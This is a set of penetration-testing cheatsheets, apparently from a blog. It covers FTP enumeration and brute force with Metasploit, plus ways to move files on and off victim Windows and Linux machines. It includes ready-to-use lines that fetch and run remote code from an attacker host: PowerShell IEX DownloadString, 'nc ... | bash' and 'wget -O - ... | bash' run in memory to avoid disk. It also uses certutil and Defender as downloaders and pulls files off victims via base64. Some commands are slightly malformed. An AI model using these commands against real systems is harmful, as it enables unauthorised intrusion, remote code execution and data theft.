Enumeration Cheatsheets

# Enumerating FTP for Pentesting (Port 21)

## Basic Enumeration

Attempt to connect anonymously by issuing the below command and specifying the following credentials; anonymous:anonymous.

ftp <ipAddress>

You can perform banner grabbing w/ the following Metasploit module.

use auxiliary/scanner/ftp/ftp_version

You can perform brute force with the following Metasploit module.

use auxiliary/scanner/ftp/ftp_login

## Transferring Files

If you have valid credentials, you can use the following command to download all files recursively.

wget --mirror 'ftp://<username>:<password>@<ipAddress>

Tips & Tricks

# Windows File Transfer Cheatsheet

Wanted to provide a single place to go for all file upload/download techniques when attacking a Windows machine from Kali Linux. This will be updated as I come across new ones and/or the next time I need to use them.

### Python Web Server

The following will start a webserver in the present working directory using Python2.
python -m SimpleHTTP Server 80

The following will start a webserver in the present working directory using Python3.
python3 -m http.server 80

### Impacket SMB Server

We’ll need to perform a few steps to set this up, but it’s a great way to transfer files to/from a system. To begin, let’s create a directory called smb on our attacking system. Files in this directory will be available on the other end, and likewise, the other end will be able to place files into this directory.
mkdir smb
impacket-smbserver <sharename> <path>

Then we can mount this file share in PowerShell from the other side.
New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName>

And change into the new drive.
cd <ShareName>:

On our Kali machine, we’ll start our Impacket server while in the directory we wish to host.
sudo impacket-smbserver <shareName> $(pwd) -smb2support -user <user> -p <password> Then on the Windows machine, we’ll connect back to this SMB share, but we’ll need to specify the credentials mentioned in the above command. To do that, we’ll use the following commands: $pass = ConvertTo-SecureString '<password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<user>',$pass)
New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName> -Credential $cred ## Downloading Files ### PowerShell The following will download and store a remote file to disk. Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe" The following will download and automatically execute the remote PowerShell script when ran from a command prompt. powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1') An alternative to the above is to use Invoke-WebRequest in a different manner. powershell.exe "IEX (IWR http://attackerIP/file.ps1 -UseBasicParsing)" ### CertUtil The following will download and store a remote file to disk. certutil.exe -urlcache -f "http://attackerIP/file.exe" file.exe ### Windows Defender The following will download and store a remote file to disk. MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file] ## Transferring with SSH To copy a file from B to A while logged into B: scp /path/to/file username@a:/path/to/destination To copy a file from B to A while logged into A: scp username@b:/path/to/file /path/to/destination ## Transferring via Base64 Encoding From within a PowerShell session, you may want to encode the file into Base64 format so you can just copy it down to your destination machine and decode it on the other side. This is handy for transferring small files. Within PowerShell, you can encode a file by running: $file-contents = Get-Content "filename.txt"
$file-encode = [System.Text.Encoding]::UTF8.GetBytes($file-contents)
[System.Convert]::ToBase64String(\$file-encode)

Then, within Kali, you can decode it using the following:
echo -n <base64String> | base64 -d > filename.txt

This should create the file for you to interact with.

Tips & Tricks

These example will show us uploading LinEnum.sh to a victim machine and executing the file straight into memory so that we write nothing to the hard-drive.

## Method A: Using Netcat

On our attacking box, find the executable you wish to transfer and run the following command:

cat <filename> | nc -nvlp 9002

On the victim machine, change into the following directory so nothing will happen if you do write to disk.

cd /dev/shm

Then transfer and execute the file by connecting back to your netcat connection.

nc 10.10.14.57 9002 | bash

## Method B: Using Wget

Host up the file using a Python web server from your Kali machine:
sudo python3 -m http.server

And then run the following command from the victim to download and execute straight into memory.
wget -O - <attackerIP>/<fileName> | bash

Tips & Tricks

# Transferring Files via Base64

Depending on the size of the file, you may not want to go through the hassle of transferring it via Netcat, FTP, or some other file transfer method.

In some cases, you can convert a file to Base64 code, and then simply copy/paste the code between the machines.

We’ll do that here. There is a file named viewuser on our victim box we want to copy to our Kali attacking machine. I already have a SSH connection to the victim box. Let’s start by converting the file to Base64.

base64 -w0 /usr/bin/viewuser

Note: -w0 gets rid of line wrapping.

We’ll highlight the code and then Copy Selection.

With that in our clipboard, head over to your Kali machine and let’s create a file called viewuser.b64

gedit viewuser.b64

Paste the code and Save the file.

Now just run the following command to decode the contents and dump it into a new file.

base64 -d viewuser.b64 > viewuser

That’s it! You’ve successfully transferred the file between machines.